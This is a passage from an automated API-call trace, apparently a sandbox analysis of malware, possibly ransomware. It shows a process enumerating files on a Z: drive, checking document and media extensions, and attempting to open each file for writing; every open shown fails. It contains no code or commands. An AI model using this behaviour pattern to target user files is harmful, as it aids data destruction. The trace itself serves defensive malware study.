nFileSizeLow=0x8daf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dSLdNV.doc", cAlternateFileName="")) returned 1 [0178.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.200] PathFindExtensionW (pszPath="Z:\\dSLdNV.doc") returned=".doc" [0178.205] CreateFileW (lpFileName="Z:\\dSLdNV.doc" (normalized: "z:\\dsldnv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.207] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7249, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VWgLcoYpNW87TI6XH.ods", cAlternateFileName="")) returned 1 [0178.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.207] PathFindExtensionW (pszPath="Z:\\VWgLcoYpNW87TI6XH.ods") returned=".ods" [0178.212] CreateFileW (lpFileName="Z:\\VWgLcoYpNW87TI6XH.ods" (normalized: "z:\\vwglcoypnw87ti6xh.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.214] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qw5s04.swf", cAlternateFileName="")) returned 1 [0178.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.214] PathFindExtensionW (pszPath="Z:\\qw5s04.swf") returned=".swf" [0178.219] CreateFileW (lpFileName="Z:\\qw5s04.swf" (normalized: "z:\\qw5s04.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.221] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfO9r7XUdR7Mn9SuaJu.flv", cAlternateFileName="")) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.221] PathFindExtensionW (pszPath="Z:\\vfO9r7XUdR7Mn9SuaJu.flv") returned=".flv" [0178.226] CreateFileW (lpFileName="Z:\\vfO9r7XUdR7Mn9SuaJu.flv" (normalized: "z:\\vfo9r7xudr7mn9suaju.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.228] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf66c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvd6SxFNPFFdWKTf.bmp", cAlternateFileName="")) returned 1 [0178.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.228] PathFindExtensionW (pszPath="Z:\\yvd6SxFNPFFdWKTf.bmp") returned=".bmp" [0178.234] CreateFileW (lpFileName="Z:\\yvd6SxFNPFFdWKTf.bmp" (normalized: "z:\\yvd6sxfnpffdwktf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.235] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11028, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hs8SJlE.pdf", cAlternateFileName="")) returned 1 [0178.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.235] PathFindExtensionW (pszPath="Z:\\Hs8SJlE.pdf") returned=".pdf" [0178.241] CreateFileW (lpFileName="Z:\\Hs8SJlE.pdf" (normalized: "z:\\hs8sjle.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.242] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k8F1wk5HusiiaH6.pdf", cAlternateFileName="")) returned 1 [0178.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.243] PathFindExtensionW (pszPath="Z:\\k8F1wk5HusiiaH6.pdf") returned=".pdf" [0178.248] CreateFileW (lpFileName="Z:\\k8F1wk5HusiiaH6.pdf" (normalized: "z:\\k8f1wk5husiiah6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.251] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5123, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r4V67Cxk5wf.pptx", cAlternateFileName="")) returned 1 [0178.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.251] PathFindExtensionW (pszPath="Z:\\r4V67Cxk5wf.pptx") returned=".pptx" [0178.257] CreateFileW (lpFileName="Z:\\r4V67Cxk5wf.pptx" (normalized: "z:\\r4v67cxk5wf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.258] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6ed2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ljwMlJaUR.gif", cAlternateFileName="")) returned 1 [0178.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.258] PathFindExtensionW (pszPath="Z:\\ljwMlJaUR.gif") returned=".gif" [0178.264] CreateFileW (lpFileName="Z:\\ljwMlJaUR.gif" (normalized: "z:\\ljwmljaur.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.265] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa862, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I235155.jpg", cAlternateFileName="")) returned 1 [0178.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.266] PathFindExtensionW (pszPath="Z:\\I235155.jpg") returned=".jpg" [0178.271] CreateFileW (lpFileName="Z:\\I235155.jpg" (normalized: "z:\\i235155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.272] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jZ8QQ.png", cAlternateFileName="")) returned 1 [0178.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.273] PathFindExtensionW (pszPath="Z:\\jZ8QQ.png") returned=".png" [0178.278] CreateFileW (lpFileName="Z:\\jZ8QQ.png" (normalized: "z:\\jz8qq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.279] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcbff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hHQWi5hCV.pdf", cAlternateFileName="")) returned 1 [0178.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.279] PathFindExtensionW (pszPath="Z:\\hHQWi5hCV.pdf") returned=".pdf" [0178.284] CreateFileW (lpFileName="Z:\\hHQWi5hCV.pdf" (normalized: "z:\\hhqwi5hcv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.286] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xdd63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBgQDjljdAi8Iv2PL.gif", cAlternateFileName="")) returned 1 [0178.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.286] PathFindExtensionW (pszPath="Z:\\jBgQDjljdAi8Iv2PL.gif") returned=".gif" [0178.291] CreateFileW (lpFileName="Z:\\jBgQDjljdAi8Iv2PL.gif" (normalized: "z:\\jbgqdjljdai8iv2pl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17642, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HcsLtIJlEmM0NTPGs.xls", cAlternateFileName="")) returned 1 [0178.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.293] PathFindExtensionW (pszPath="Z:\\HcsLtIJlEmM0NTPGs.xls") returned=".xls" [0178.298] CreateFileW (lpFileName="Z:\\HcsLtIJlEmM0NTPGs.xls" (normalized: "z:\\hcsltijlemm0ntpgs.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.300] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QfHsttYoiqOGUUjwI5r.swf", cAlternateFileName="")) returned 1 [0178.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.300] PathFindExtensionW (pszPath="Z:\\QfHsttYoiqOGUUjwI5r.swf") returned=".swf" [0178.305] CreateFileW (lpFileName="Z:\\QfHsttYoiqOGUUjwI5r.swf" (normalized: "z:\\qfhsttyoiqoguujwi5r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.307] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x607c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8me2d.pptx", cAlternateFileName="")) returned 1 [0178.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.307] PathFindExtensionW (pszPath="Z:\\8me2d.pptx") returned=".pptx" [0178.311] CreateFileW (lpFileName="Z:\\8me2d.pptx" (normalized: "z:\\8me2d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.313] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9697, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K7PKxXbGrKXfVhE.ppt", cAlternateFileName="")) returned 1 [0178.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.313] PathFindExtensionW (pszPath="Z:\\K7PKxXbGrKXfVhE.ppt") returned=".ppt" [0178.317] CreateFileW (lpFileName="Z:\\K7PKxXbGrKXfVhE.ppt" (normalized: "z:\\k7pkxxbgrkxfvhe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.319] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa60c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFDjrYVFhxr1o.rtf", cAlternateFileName="")) returned 1 [0178.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.319] PathFindExtensionW (pszPath="Z:\\yFDjrYVFhxr1o.rtf") returned=".rtf" [0178.324] CreateFileW (lpFileName="Z:\\yFDjrYVFhxr1o.rtf" (normalized: "z:\\yfdjryvfhxr1o.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.326] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x142d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvxie8.docx", cAlternateFileName="")) returned 1 [0178.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.326] PathFindExtensionW (pszPath="Z:\\uvxie8.docx") returned=".docx" [0178.331] CreateFileW (lpFileName="Z:\\uvxie8.docx" (normalized: "z:\\uvxie8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.333] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfe90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aVdNk.pps", cAlternateFileName="")) returned 1 [0178.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.333] PathFindExtensionW (pszPath="Z:\\aVdNk.pps") returned=".pps" [0178.338] CreateFileW (lpFileName="Z:\\aVdNk.pps" (normalized: "z:\\avdnk.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.340] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="igduZ1s2R.xlsx", cAlternateFileName="")) returned 1 [0178.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.340] PathFindExtensionW (pszPath="Z:\\igduZ1s2R.xlsx") returned=".xlsx" [0178.345] CreateFileW (lpFileName="Z:\\igduZ1s2R.xlsx" (normalized: "z:\\igduz1s2r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.347] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcb6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RtBpO.pps", cAlternateFileName="")) returned 1 [0178.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.347] PathFindExtensionW (pszPath="Z:\\RtBpO.pps") returned=".pps" [0178.352] CreateFileW (lpFileName="Z:\\RtBpO.pps" (normalized: "z:\\rtbpo.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.353] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12aca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ekGGyeqFk2bhWU.jpg", cAlternateFileName="")) returned 1 [0178.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.354] PathFindExtensionW (pszPath="Z:\\ekGGyeqFk2bhWU.jpg") returned=".jpg" [0178.359] CreateFileW (lpFileName="Z:\\ekGGyeqFk2bhWU.jpg" (normalized: "z:\\ekggyeqfk2bhwu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 